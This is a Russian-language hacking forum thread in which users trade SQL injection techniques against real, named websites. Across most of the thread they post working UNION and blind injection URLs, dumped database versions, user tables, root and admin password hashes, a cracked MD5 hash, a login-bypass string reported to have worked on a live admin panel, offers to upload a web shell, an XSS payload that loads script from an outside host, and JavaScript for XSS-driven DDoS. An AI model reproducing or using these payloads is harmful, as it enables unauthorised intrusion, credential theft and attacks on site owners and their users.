скажите пожалуйсто а рейтинг в контакте имеет уязвимости???
Почитай статьи про уязвимости а потом задавай вопросы !!!

если я не ошибаюсь то если переменной не присваивается значение, то поле её вывода остается пустым, т.к. допустим:


$para = "";
echo $para;

Так вот если в переменную $para нихрена не поступает, то она и выводет пустое поле... а так как у тебя значение echo прописано в двойной ковычке, то это если ты не знал, обозначает для пхп, что следующий текст не нужно интерпритировать...

А как тогда она выводится???

Вообщем, дело такое.
тут я, вроде бы, что-то как-то разобрался:

http://www.gps-ru.ru/index.php?sn=-rbc805%27+union+select+1,2,3,4,5,6,7,concat_ws(0x3 a,version(),0x3a,user(),0x3a,database())/*

4.1.20 : grantsps@localhost : grantsps
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.gps-ru.ru/index.php?sn=-rbc805%27+union+select+1,2,3,4,5,6,7,concat_ws(0x3 a,id,login,password)+from+users/*

1 : off-docnescott : 977dd41592714ff1b63f9ea806c6e150
gnutella

правда, куда этот логин/пасс втыкать не въехал (http://www.gps-ru.ru/admin не катит)

есть еще вот такое срамотный сайт:


http://www.glaad.org/action/calls_archive_detail.php?id=-4805+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20/*
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.glaad.org/action/calls_archive_detail.php?id=-4805+union+select+1,2,3,4,5,concat_ws(0x3a,version (),0x3a,user(),0x3a,database()),7,8,9,10,11,12,13, 14,15,16,17,18,19,20/*
>> 4.0.12-standard : glaad@localhost : glaad_www_1

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.glaad.org/action/calls_archive_detail.php?id=-4805+union+select+1,2,3,4,5,concat(user,0x3a,passw ord),7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+m ysql.user+limit+0,1/*
>> root:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.glaad.org/action/calls_archive_detail.php?id=-4805+union+select+1,2,3,4,5,concat(user,0x3a,host) ,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+mysql .user+limit+0,1/*
>> andy : 66.28.254.%

вот во 2-м случае я не понял: кто такой andy[B]? и как бы мне найти логин/пароль как из 1-го случая....

во-втором случае тебе нужно вручную подобрать колонку в которой хранится информация о пользователях системы типа user, по другому никак
Тебе флудом мозги съело? Он вручную будет подбирать дефолтную структуру таблицы мускуля? Омфг.
mysql> select column_name from information_schema.columns where table_name='mysql.user';
+-----------------------+
| column_name |
+-----------------------+
| Host |
| User |
| Password |
| Select_priv |
| Insert_priv |
| Update_priv |
| Delete_priv |
| Create_priv |
| Drop_priv |
| Reload_priv |
| Shutdown_priv |
| Process_priv |
| File_priv |
| Grant_priv |
| References_priv |
| Index_priv |
| Alter_priv |
| Show_db_priv |
| Super_priv |
| Create_tmp_table_priv |
| Lock_tables_priv |
| Execute_priv |
| Repl_slave_priv |
| Repl_client_priv |
| Create_view_priv |
| Show_view_priv |
| Create_routine_priv |
| Alter_routine_priv |
| Create_user_priv |
| ssl_type |
| ssl_cipher |
| x509_issuer |
| x509_subject |
| max_questions |
| max_updates |
| max_connections |
| max_user_connections |
+-----------------------+
37 rows in set

Вообщем, дело такое.
тут я, вроде бы, что-то как-то разобрался:

правда, куда этот логин/пасс втыкать не въехал (http://www.gps-ru.ru/admin не катит)

а ты уверен что off-docnescott - это админ?


вот во 2-м случае я не понял: кто такой andy[B]? и как бы мне найти логин/пароль как из 1-го случая....

поробу вот так:
http://www.glaad.org/action/calls_archive_detail.php?id=-4805+union+select+1,2,3,4,5,concat_ws(0x3a,user,pa ssword,host,file_priv) ,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+mysql .user+where+host='%'/*

Как никак! Если запрос http://dom2.ru/heroes/1697' проходит и переменая $hero.name не проверяется вот и по этому она выводится! так как она пустая функция echo выводит её не как переменю а как текст! Пример echo ("$hero.name"); из этого следует что запрос к базе прошел!!! Я не прав?
$hero.name - это не переменная, присваивающая входящие данные, а скорее всего обозначение для шаблонизатора, куда он должен вставлять соответствующие данные из базы данных или файлов. Уязвимости в данном случае нет.

']$hero.name - это не переменная, присваивающая входящие данные, а скорее всего обозначение для шаблонизатора, куда он должен вставлять соответствующие данные из базы данных или файлов. Уязвимости в данном случае нет.

http://dom2.ru/magazine/numbers/1308392'

а вот это? :confused:

это тоже самое

http://www.democracy.ru/article.php?id=-1+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12 ,13,14,15,16+from+information_schema.tables+limit+ 176,20000--
помогите это докрутить =))
уже 2 часа епусь)) все таблицы перебрал и ничего =((

А чего там перебирать-то? Вот все данные, всего 244 таблицы, есть и интересные:


=============================
www.democracy.ru
75.101.142.224
=============================
-------
Версия MySQL:
5.0.45
-------
Имя базы:
iesd
-------
Юзер:
alex@localhost
-------
@@basedir:
/usr/
-------
@@datadir:
/var/lib/mysql/
-------
@@tmpdir:
/tmp/
-------
@@version_compile_os:
redhat-linux-gnu
-------


Список таблиц сюда не влез, скачать здесь можно:

http://slil.ru/26513292

дел на 4 минуты:)

http://www.heroeswm.ru/battlechat.php?warid[]=
Чё означает эта ошибка?

Не могли бы помочь глянуть в админку есть ли что нибкудь??
http://la2sfer.ru/admin/
что с ней можно сделать?
брут\инъеция...
еще вот что нашел:
http://la2sfer.ru/data/admin
http://la2sfer.ru/news (возможжно тоже пригодится, хотя search.php предусмотрительно удален)

а ты уверен что off-docnescott - это админ?



поробу вот так:
http://www.glaad.org/action/calls_archive_detail.php?id=-4805+union+select+1,2,3,4,5,concat_ws(0x3a,user,pa ssword,host,file_priv) ,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+mysql .user+where+host='%'/*

Не, не покатило.
Лан, продолжу ковырять...

4adr0s, в первом случае что бы не мучатся сделай так:
заходишь сюда: http://gps-ru.ru/admin/
в поле login пишешь ' or 1=1/* в поле password что угодно.

Гы! Проехало!

http://www.heroeswm.ru/battlechat.php?warid[]=
Чё означает эта ошибка?
Попытка привести вектор к скалярному типу. По-идее массив должен был привестись к int(1), но почему-то у них NOT_A_SCALAR_PLACEHOLDER_0. Видимо используют самописные функции для приведения к целочисленному типу.
Врядли там есть норм скуль-инъект.

Вот нашел скулю
http://www.niobraracountylibrary.org/obituaries/?id=2769'
роскрутил чуть чуть
http://www.niobraracountylibrary.org/obituaries/?id=2769'+union+select+1,2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17/*
дальше начались траблы подставляю вместо 14 version()

http://www.niobraracountylibrary.org/obituaries/?id=2769'+union+select+1,2,3,4,5,6,7,8,9,10,11,12, 13,version(),15,16,17/*

выдает ошыбку. Решил перевести в чар получился такой запрос
http://www.niobraracountylibrary.org/obituaries/?id=2769'+union+select+1,2,3,4,5,6,7,8,9,10,11,12, 13,CHAR(118,101,114,115,105,111,110,40,41),15,16,1 7/*
вместо 14 терь стоит version(). Как узнать версию???

Как узнать версию???
вот так
http://www.niobraracountylibrary.org/obituaries/?id=2769%27+union+select+1,2,3,4,5,6,7,8,9,10,11,1 2,%2013,unhex(hex(version())),15,16,17/*

спс
вот начал подбирать имена таблиц и тут ввел mysql.user и ответ получил не такой как всегда:
MySQL Error: Access denied for user 'dsturman'@'208.113.192.0/255.255.224.0' to database 'mysql' может тут какая-то привязка по ИР
http://www.niobraracountylibrary.org/obituaries/?id=2769'+union+select+1,2,3,4,5,6,7,8,9,10,11,12, 13,999,15,16,17+from+mysql.user/*

http://hackzona.net/index.php?id=p=authorization&auth_username=111-222-1933email@address.com&auth_password=%5C%22&auth_automatic=off

http://hackzona.net/?id=1'&s=silvermail.info
вообще хз что значит

Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in /home/users/s/slavon-x86/docs/sql/main.php on line 14

При добавлений задачи на http://cronjob.ru появилась следующая ошибка:

Warning: mysql_result() [function.mysql-result]: Unable to jump to row 0 on MySQL result index 7 in /sql/hosts/cronjob.ru/act.php on line 54

Интересно что это значит. :confused:

http://www.heroeswm.ru/battlechat.php?warid[]=
Чё означает эта ошибка?
NOT_A_SCALAR_PLACEHOLDER_0 явно свидетельствует об использовании библиотеки для работы с БД, заменяющая так называемые плейсхолдеры ? в SQL-запросах на те данные, которые указаны в качестве аргументов к функции выполнения запросов. Данные в аргументах обрабатываются в соответствии с типом, что исключает возможность проведения SQL-инъекций. В данном случае используется DbSimple от Дмитрия Котерова, уязвимости здесь нет.

При добавлений задачи на http://cronjob.ru появилась следующая ошибка:

Warning: mysql_result() [function.mysql-result]: Unable to jump to row 0 on MySQL result index 7 in /sql/hosts/cronjob.ru/act.php on line 54

Интересно что это значит. :confused:
Значит MySQL вернул пустой результат, т.е. в коде отсутствует проверка с помощью функции mysql_num_rows()

спс
вот начал подбирать имена таблиц и тут ввел mysql.user и ответ получил не такой как всегда:
MySQL Error: Access denied for user 'dsturman'@'208.113.192.0/255.255.224.0' to database 'mysql' может тут какая-то привязка по ИР
все просто - у текущего пользователя dsturman нет доступа к базе данных mysql

http://hackzona.net/index.php?id=p=authorization&auth_username=111-222-1933email@address.com&auth_password=%5C%22&auth_automatic=off

http://hackzona.net/?id=1'&s=silvermail.info
вообще хз что значит

Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in /home/users/s/slavon-x86/docs/sql/main.php on line 14
на лицо ошибка в логике скрипта, однако SQL-инъекцию здесь вряд ли можно провести, так как данные обрабатываются функцией preg_match(). Об этом свидетельствует ошибка : preg_match() expects parameter 2 to be string, array given при передаче массива в параметре id:
http://hackzona.net/?id[]=1&s=silvermail.info

http://www.moreyspiers.com/gallery.php?cat_id=14'
непохек?

http://www.tk-expo.ru/news/?id=-8+GROUP+BY+9--
кол-во столбцов = 9
inj не получается..
кто сделает отпишите какой должен быть запрос для inj :)

http://www.photosale.ru/find/search.php


XSS

http://kadet.ru/index.php?page=guest


XSS

2z00man
http://www.tk-expo.ru/news/?id=8+and+51=ascii(substring(version(),1,1))--
3я ветка мускула.

http://www.photosale.ru/find/search.php


XSS


http://kadet.ru/index.php?page=guest


XSS

И?

просто так выложил)))))

непохек?
http://www.moreyspiers.com/gallery.php?cat_id=-15'+union+select+1,concat_ws(0x3a,User(),Database( ),Version()),3,4,5,6,7,8+--+
Раскрытие путей..
Не торопись

http://www.oceanworld.com.au/page.asp?id=-8+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
выводиться поле 2, при попытки вместо 2 написать version() или user() - ошибка

vesion(): mysqld-5.0.18-nt

http://www.oceanworld.com.au/page.asp?id=-8+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+fr om+information_schema.tables--

как сделать вывод???

http://www.oceanworld.com.au/page.asp?id=-8+union+select+1,unhex(hex(version())),3,4,5,6,7,8 ,9,10,11,12,13,14--

Одно и тоже на каждой странице темы=\

А можно ли счесть за уязвимость то что когда регишься на сайте тот логин который ты ввёл будет отоброжаться в ссылке так www.site.ru/users/твойлогин ?

FunkFan, наврятли.

http://shop.m-matching.jp/chara/prd_detail.php?ID=10001060+or+1=1--
http://shop.m-matching.jp/chara/prd_detail.php?ID=10001060+order+by+1--
нету вывода? (

http://www.glassfactory.co.jp/shop/detail.php?id=-4+or+1=1--
и вот еще как составить правильный запрос к бд postgre?

нету вывода? (


и вот еще как составить правильный запрос к бд postgre?

на первом кажет нету инекций

второй
http://www.glassfactory.co.jp/shop/detail.php?id=-5+union+select+TABLENAME+from+PG_TABLES+LIMIT+1+OF FSET+1--

есть такая тема (http://forum.antichat.ru/showthread.php?p=310974#post310974)

sabe

первый

http://shop.m-matching.jp/chara/prd_detail.php?ID=10001060999999999999+union+selec t+1,2,3,4,version(),null,null,null,null,111,1212,1 3,14,null,null--

второй так вывод лучше :)

http://www.glassfactory.co.jp/shop/detail.php?id=-5+union+select+1,null,TABLENAME,null,null,null,nul l,null,null,null,null,null,null,null,null,null,nul l+from+PG_TABLES--

Обе PostgreSQL

_evgeniy_
есть скуль..

второй спасибо)

jokester
как всегда ты на высоте))))

помогите раскрутить ,
в запросе походу идет фильтр на все что только можно, почти

http://www.myreductil.com/buynow.php?pack_id=-1%20union%20select%201,22-2,333,4444,55,6,7,8,99,23,11,12,13,14,15,16,17%20f rom%20products/*

умножение сложение в некоторых колонках работает , а вот банальный вывод версии мускула никак не проходит , гляньте кто шарит плиз?

есть какие нибудь предположения по заливке шелла в dle 7.2/7.3
извините если не по сабжу

помогите раскрутить ,
в запросе походу идет фильтр на все что только можно, почти

http://www.myreductil.com/buynow.php?pack_id=-1%20union%20select%201,22-2,333,4444,55,6,7,8,99,23,11,12,13,14,15,16,17%20f rom%20products/*

умножение сложение в некоторых колонках работает , а вот банальный вывод версии мускула никак не проходит , гляньте кто шарит плиз?
Скобки ему не нравятся
http://www.myreductil.com/buynow.php?pack_id=11+and+1=2+union+select+1,22,3, 4,5,6,7,8,9,0,11,@@version,13,14,15,16,17/*

Здравствуйте расскажите мне пожалуйста про эту штуку Blind SQL/XPath injection http://l2just.net/index.php?login=submit+and+31337-31337=0+--+&login_name=root&login_password=%2E%2E%2E%2E%2E%2E а что дальше делать незнаю помогите пожалуйста!

http://www.museum.ru/gmii/news.asp?id=-1%27
Ну не понимаю я как с MSSQL работать. Мб помогете.
тиц 13000 PR 5

вот нашел Blind SQL/XPath injection http://l2just.net/index.php?login=submit+and+31337-31337=0+--+&login_name=root&login_password=%2E%2E%2E%2E%2E%2E что дальше делать непойму скажите плз!

как узнать какая OC стоит вместе с сайтом?(сайт известен)

В MySQL существуют системные переменные:

@@basedir
@@datadir
@@tmpdir
@@version_compile_os


последняя - ось

мм... не понял, доступа к MySql у мя нету, мне известен токо сайт а самого доступа нет

us, вообще-то это приватная инфо, которая равносильна знанию (а может и покруче) version() при sql-inj. Вывод - сначала надо сайтик заломать, потом получать приватную инфо и наслаждаться рез-тами

ЗЫЖ Раздел вроде как "Уязвимости называется" - уязвимости, ведущие ко взлому, получению приватной инфы, дальше делай выводы сам:) Удачи

В данном случае эта инфа тебе поможет только если ты нашел sql-inj на сайте, подобрал кол-во колонок и узнал хотя бы version() БД

diznt
nmap -0 или любой сканер,способный на это, или снятие баннеров, или просто тупо вбей
site.ru/index.php
site.ru/index.PHP
винде пофиг на регистр, или по ошибкам, всякое бывает, это вобщем целая история.... способов куча

diznt, пусть браузер выдаст окно ошибки, внизу увидишь название системы, версию сервера и т.п., но не факт, что все - истина

http://www.hard-ekt.ru/index.php?section=-1+union+select+1%20--

помогите подобрать количество колонок..

http://www.hard-ekt.ru/index.php?section=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20%20--

F4R
Может пора заканчивать с такими вопросами?
В чём у тебя возникли сложности? Или тебе просто лень? Там всё элементарно, а это уже наверное 10 твой такой вопрос, неужели так трудно подбирать колонки?
Прочитай одну любую статью по скулям

дак я читал...
просто непонятно вы что в ручную всё подбраете или тупо линк кинули в прогу и она сама подобрала?

дак я читал...
просто непонятно вы что в ручную всё подбраете или тупо линк кинули в прогу и она сама подобрала?А что там подбирать-то?
order by
group by
в статьях это отлично расписано

http://www.hard-ekt.ru/index.php?section=1+union+select+1,2,3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20/* читай внимательнее!!!

http://www.hard-ekt.ru/index.php?section=1+union+select+1,2,3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20/* читай внимательнее!!!
как то ты не в тему))

а какие есть способы нахождения админки кроме тупого подбора?
http://www.hard-ekt.ru/
где например она находится здесь?

а какие есть способы нахождения админки кроме тупого подбора?
http://www.hard-ekt.ru/
где например она находится здесь?
иногда помогает файл robots.txt
http://www.hard-ekt.ru/wedadmin/

а какие есть способы нахождения админки кроме тупого подбора?
http://www.hard-ekt.ru/
где например она находится здесь?

Всегда как минимум смотри исходники страницы, увидел Joomla, Wordpress и тому подобное - делаешь выводы, где админка. Или слушаешь совет выше, или пишешь свой брутер на диры (не так сложно, кстати)

ЗЫЖ за исключением наличия полей ввода логина-пароля прямо на главной странице, конечно:)

А как реализовывается обход авторизации к примеру в данном случае
SELECT * FROM adminpanel WHERE pass = ' ' ?

А как реализовывается обход авторизации к примеру в данном случае
SELECT * FROM adminpanel WHERE pass = ' ' ?
если уязвимо поле pass то в это поле пишем
12345' OR login='admin'; --
запрос станет таким
SELECT * FROM adminpanel WHERE (login='admin' AND pass='12345') OR (login='admin');
авторизация будет успешна пройдена под логином admin

там ограничение на длину=7

там ограничение на длину=7
линк в студию =)

' or 1/*
Тут 8, если ограничение только в форме, перехватывай пакет

что это?)
http://www.productdose.com/index.php?cat_id=2+or+1=1

' or 1#
7 ;)

Всем привет.

Подскажите, нипАнятна.

пытаюсь вывести данные из колонки admin:
=-345+union+select+1,2,concat_ws(0x3a,admin_user,adm in_password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19+from+admin--

Ничего не выводит. Пробую лимит, тоже самое. Хэксил - пусто.

Пишу:

=-345+union+select+1,2,count(*),4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19+from+admin--

Выводит число 149

Чиво делаю не правильно?

Попробуй без concat'а.

-345+union+select+1,2,admin_password,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,1 8,19+from+admin--

R1dex, уже пробовал, не катит. хммммм...

кто что знает от xss ddos?

например через функцию ajax:
setInterval("ajaxFunction()",5)

или вот это:
var req;
var targets = new Array("http://google.com","http://yandex.ru");
function SendHTTP(url) {
req = false;
if (window.XMLHttpRequest) { // не ИЕ
req = new XMLHttpRequest();
} else if (window.ActiveXObject) { // ИЕ
req = new ActiveXObject("Microsoft.XMLHTTP");
}
if (req) {
req.open("GET", url, true);
req.send();
}
}
function terror() {
for (i=0;i<targets.length;i++) {
SendHTTP(targets[i]);
}
}

R1dex, уже пробовал, не катит. хммммм...

Даже не знаю..
Может там две таблицы admin? Одна лежит в бд к которой ты подключен, но в ней нет колонок "admin_user","admin_password".
А вторая в другой бд и в ней как раз эти колонки?
Маловероятно, конечно, но вдруг ^^

А вообще - лучше линк выкладывать...

Ребята, такой вопрос. Нашол таблицу phpbb_users, при запросе
http://www.cdma.kh.ua/articles/index.php?view=article&id=-999%20union%20select%201,column_name,3+from+inform ation_schema.columns+where+table_name=%27phpbb_use rs%27+limit+1,1
выбивало ошибку, прочитал весь форум, понял, нада закодирывать...кодирнул в чар...выдаёт тупо пустую страницу....В чём моя ошибка....подскажите плиз..всю ночь просидел.

Возможно, ты кодируешь 'phpbb_users', а нужно phpbb_users. (без кавычек)

http://www.cdma.kh.ua/articles/index.php?view=article&id=-999%20union%20select%201,column_name,3+from+inform ation_schema.columns+where+table_name=0x7068706262 5f7573657273+limit+1,1--

vakula
http://www.cdma.kh.ua/articles/index.php?view=article&id=-999+union+select+1,concat_ws(0x3a,username,user_pa ssword),3+from+phpbb_users+where+user_level=1+limi t+0,1
разшифруеш один из двух хешей залью тебе шелл )

по поводу 1 вопроса дай линк гляну..

Всем спасибо.....обидно...я просто не внимательный

vakula

разшифруеш один из двух хешей залью тебе шелл )

по поводу 1 вопроса дай линк гляну..

Линк на что?

Я так понимаю хэш нереально розшифривать?

Возможно, ты кодируешь 'phpbb_users', а нужно phpbb_users. (без кавычек)

http://www.cdma.kh.ua/articles/index.php?view=article&id=-999%20union%20select%201,column_name,3+from+inform ation_schema.columns+where+table_name=0x7068706262 5f7573657273+limit+1,1--

Подскажи плиз, что можна с пасом зделать?

login:pv
pass:e4a1767e13d8cae53abc0a69c5e6c3cd

adminka http://www.cdma.kh.ua/admin

Я так понимаю хэш нереально розшифривать?

Почему?

Беря : e73f75e5b7e7924e2949d39762539117 : 21436578

Почему?

Беря : e73f75e5b7e7924e2949d39762539117 : 21436578

Ты кудесник!!! Обьясни ламеру каким образом ты ето сделал. Плиз

F.a.q. - всё о хешах : https://forum.antichat.ru/thread26983.html
On-line cервисы расшифровки md5 : https://forum.antichat.ru/threadnav11028-1-10.html

Вопрос насчет скули..
http://www.equipnet.ru/equip_cat.php?cat_id=-209+union+select+TABLE_NAME+FROM+INFORMATION_SCHEM A.TABLES+LIMIT+102,1--

вижу, что есть таблица users.
пытаюсь получить столбцы, но не выхходит =(
http://www.equipnet.ru/equip_cat.php?cat_id=-209+union+select+COLUMN_NAME+FROM+INFORMATION_SCHE MA.COLUMNS+WHERE+TABLE_NAME='users'--

помогите, пожалуйста - тут чистый интерес.

wildshaman

Кавычки не жрёт

Зехекси users и перебирай.

http://www.equipnet.ru/equip_cat.php?cat_id=-209+union+select+COLUMN_NAME+FROM+INFORMATION_SCHE MA.COLUMNS+WHERE+TABLE_NAME=0x7573657273--

выводит нормально.

wildshaman

Кавычки не жрёт

Зехекси users и перебирай.

http://www.equipnet.ru/equip_cat.php?cat_id=-209+union+select+COLUMN_NAME+FROM+INFORMATION_SCHE MA.COLUMNS+WHERE+TABLE_NAME=0x7573657273--

выводит нормально.
Спс, я б сам не догадался)

Не подскажите нуда XSS вставлять в этом коде?
Или путь до JS
XSS для IPB v2.1.7



http://www.ya.ru/ onerror=script=document.createElement(String.fromC harCode(115,99,114,
105,112,116)),script.src=/http:xxdaim.ruxmonzterxforum/.source.replace(/x/g,String.fromCharCode(47)),
head=document.getElementsByTagName(String.fromChar Code(104,101,97,100)).item(0),head.appendChild(scr ipt)
style=visibility:hidden =.gif

Если ставлю вместо
src=/http:xxdaim.ruxmonzterxforum/

вот такое
src=/http:xxhost.ruxmonzterxscriptxmonzterxjs.js/

то всё ок но после перехода по картинке (которая образованна XSS) выходит сообщение:
"Некоторые требуемые файлы отсутствуют. Если вы хотели просмотреть тему, возможно эта тема перемещена или удалена. Вернитесь назад и попробуйте снова."

также пробовал вставить туда
alert()
Ошибка таже...

пытаюсь вывести данные из колонки admin:
=-345+union+select+1,2,concat_ws(0x3a,admin_user,adm in_password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19+from+admin--

Ничего не выводит. Пробую лимит, тоже самое. Хэксил - пусто.

Пишу:

=-345+union+select+1,2,count(*),4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19+from+admin--

Выводит число 149

Гоняем одни и те-же вопросы по кругу.

Господа, вывод это не мёд (вроде есть, и сразу нет), он или есть, или нет.

Если Вы видите вывод цифры, то он есть 100%, а невозможность вывода данных может быть только в нескольких случаях

1 Таблица пустая
Проверяется count(*)
union+select+1,2,count(*),4+from+user
либо для 5 ветки так
union+select+1,table_rows+from+information_schema. tables+where+table_name='user'
Если ковычки слешируются, перевести название таблицы/колонки в hex или в CHAR, кому как нравится
Для hex это выглядит так(добавляем к hex впереди 0x что-бы база поняла, что за данные мы ей втюхиваем):
union+select+1,table_rows+from+information_schema. tables+where+table_name=0x7573657273
для CHAR так:
union+select+1,table_rows+from+information_schema. tables+where+table_name=char(117,115,101,114,115)
Как видим обошлись без ковычек (сдесь table_name=users)
Некоторые индивидумы умудряются загонять в хекс или чар вместе с ковычками, тоесть так 'users'=27757365727327, так делать ненадо, я Вас умоляю )
Внимание, операторы, функции, и т.д переводить в hex или char нельзя(точнее, переводить то можно, но база Вас не поймёт ))
2 Таблица в другой базе
В базе information_schema хранится информация обо всех таблицах и столбцах из всех баз, и есть вероятность того, что ваша таблица находится не в той базе с которой работает скрипт
Проверяем(5 ветка) :
table_schema+from+information_schema.tables+where+ table_name='user', а база с которой работает скрипт выводится database(). Если базы разные, пробуем обратится к той которая нужна
union+select+1,2,count(*),4+from+base.user (по аналогии с mysql.user)
3 Несоответствие кодировки
Что-бы получить данные в нужной нам кодировке можно пользоваться либо функциями приведения типов:
cast(Version()+as+binary)
CONVERT(Version(),binary)
convert(version()+using+latin1)
Либо шифровать/дешифровать данные. Результат при этом возвращается уже в "правильной" кодировке
aes_decrypt(aes_encrypt(Version(),1),1)
unhex(hex(version()))
4 Несоответствие типа данных
MySql к типам данных лоялен, а вот другие базы нет.Если база не mysql, читаем статьи по своей базе и приводим данные к нужному типу.
5 Закрыт доступ к таблице\базе
Опять-же, в mysql нельзя ограничить доступ к таблице, (можно только к базе), а в некоторых других базах можно

*Все примеры даны для mysql , в других базах другой синтаксис(читаем статьи)

Это основные причины невозможности вывода данных, которые решат 99% ваших вопросов.

jokester
Молодец конечно, за старания +, но дело в том, что сейчас твой пост в следующей паре затеряется и все вопросы начнут прогонять по кругу.Одни и те же.
ЛЮДИ, читайте тему! На любой ваш вопрос здесь 99% уже есть ответ, и не один!
На банальные вопросы в скором времени вам никто отвечать не будет, будете обижаться.Включайте мозг, и платите налоги =)

Вот вопрсоег.
http://www.electionguide.org/country-news.php?ID=208+GROUP+BY+8+-- - ошибка не выводится, значит столбцов 8.
Делаю запрос http://www.electionguide.org/country-news.php?ID=208+UNION+SELECT+1,2,3,4,5,6,7,8+--
А мне пишет:
Query Error: The used SELECT statements have a different number of columns
Как будто количество неверно...

Потому что там вот такая ошибка идет:


http://www.electionguide.org/country-news.php?ID=208+order+by+10--



Query Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY news_items.news_date DESC' at line 9
SQL: SELECT news_items.id, news_title, news_date, rss_title, IF(ext_id>0, news_link, CONCAT('http://www.electionguide.org/country-news.php?ID=',country.id,'#anchor_', news_items.id)) as news_link, IF(ext_id>0, external_news.rss_title, 'ElectionGuide') as news_source, news_content, ext_id FROM news_items LEFT JOIN country on country.id=news_items.country LEFT JOIN external_news ON external_news.id=news_items.ext_id WHERE news_items.is_active=1 AND news_items.country=208 order by 10-- ORDER BY news_items.news_date DESC


LEFT JOIN, или искать уязвимость в другом месте, или фактически blind sql-inj

Используй order+by

Нет ошибки:

http://www.electionguide.org/country-news.php?ID=208+order+by+50--

Ошибка:

http://www.electionguide.org/country-news.php?ID=208+order+by+51--

Итого:

http://www.electionguide.org/country-news.php?ID=-208+union+select+1,2,version(),4,5,6,7,8,9,0,1,2,3 ,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 ,9,0,1,2,3,4,5,6,7,8,9,0--

Вывод в title.

R1dex
Опередил, там два запроса, в одном 8 полей во втором 50, это вывод из 2-го

R1dex красавчег, а я в исхолники не посмотрел. +5

Еще вопросег =)
http://www.check6gaming.com/news.php?id=67+GROUP+BY+100+--
пробовл все, вплоть до 0 - сначала ишед Unknown column, а когда подставляю 1 или 0 - Can't group on 'count(*)'
Что я делаю не так?

Еще вопросег =)
http://www.check6gaming.com/news.php?id=67+GROUP+BY+100+--
пробовл все, вплоть до 0 - сначала ишед Unknown column, а когда подставляю 1 или 0 - Can't group on 'count(*)'
Что я делаю не так?
вот что смог определить
http://www.check6gaming.com/news.php?id=67+and+substring(@@version,1,1)=5
5 версия мускула

вот что смог определить
http://www.check6gaming.com/news.php?id=67+and+substring(@@version,1,1)=5
5 версия мускула
Гм, интеренсо...
А продробней не расскажешь, как определял - какие промежуточные действия были до hand+substring(@@version,1,1)=5

wildshaman
Использовал подзапросы, посимвольный перебор
читай _www.abc-it.lv/index.php/id/715

промежуточные действия

substring(@@version,1,1)=3
substring(@@version,1,1)=4
substring(@@version,1,1)=5

5 возвращает true. Значит версия пятая.
Так же можешь перебрать user,database и т.д.

Гм, интеренсо...
А продробней не расскажешь, как определял - какие промежуточные действия были до hand+substring(@@version,1,1)=5
вот имеется наш урл:
http://www.check6gaming.com/news.php?id=67
для теста на inj проверяем
http://www.check6gaming.com/news.php?id=67+and+1=1
выводится тот же запрос,что и при id=67
определяем версию:
substring(@@version,1,1)=4
первый символ сравниваем с 4, если 4 версия то отобразиться такая же странцица как и при id=67

наконец запрос http://www.check6gaming.com/news.php?id=67+and+substring(@@version,1,1)=5 не выдает ошибки, соответственно версия мускула = 5

вот имеется наш урл:
http://www.check6gaming.com/news.php?id=67
для теста на inj проверяем
http://www.check6gaming.com/news.php?id=67+and+1=1
выводится тот же запрос,что и при id=67
определяем версию:
substring(@@version,1,1)=4
первый символ сравниваем с 4, если 4 версия то отобразиться такая же странцица как и при id=67

наконец запрос http://www.check6gaming.com/news.php?id=67+and+substring(@@version,1,1)=5 не выдает ошибки, соответственно версия мускула = 5
Хех, спасибо =)
Как бы еще количество столбцов...

Хех, спасибо =)
Как бы еще количество столбцов...

Если слепую крутить, то и кол-во столбцов не нужно.

http://www.check6gaming.com/news.php?id=67+and+substring((select+table_name+fr om+information_schema.tables+limit+17,1),1,18)='fp _accomplishments'

хай
Есть скуль на сайте
база MSSQL
ввожу
index.cfm?page=search&searchstring=111-222-1933email@address.tst&searchtype=@@version или (select+system_user)
все нормально выводит
но как только пытаюсь вывести имена таблиц, страница просто перезагружается, не каких ошибок и прочего :(

В чем трабла? как вывести имена таблиц и колонок?

2 wildshaman:

http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((SELECT+p assword+from+mysql.user+WHERE+user='root'),1,1)))

А таблицы можешь так подбирать:

http://www.check6gaming.com/admin.php?name=67+AND+ascii(lower(substring(CONCAT _WS(0x3a,(select+name+from+admin+LIMIT+0,1),(selec t+name+from+admin+LIMIT+1,1),(select+name+from+adm in+LIMIT+2,1)),1,1)))=97

2 wildshaman:

http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((SELECT+p assword+from+mysql.user+WHERE+user='root'),1,1)))

А таблицы можешь так подбирать:

http://www.check6gaming.com/admin.php?name=67+AND+ascii(lower(substring(CONCAT _WS(0x3a,(select+name+from+admin+LIMIT+0,1),(selec t+name+from+admin+LIMIT+1,1),(select+name+from+adm in+LIMIT+2,1)),1,1)))=97
спс, но во втором случае пишед ошибку 404 нот фаунд (пробелы убрал), а в первом - SELECT command denied to user 'check6ga_root'@'localhost' for table 'user' =(

Взломал сайт, получил доступ в админку, пытаюсь залить шелл-проверяется расширение файла (только jpg or gif)
file_priv отключён, доступа к mysql.user нет, только в админку.
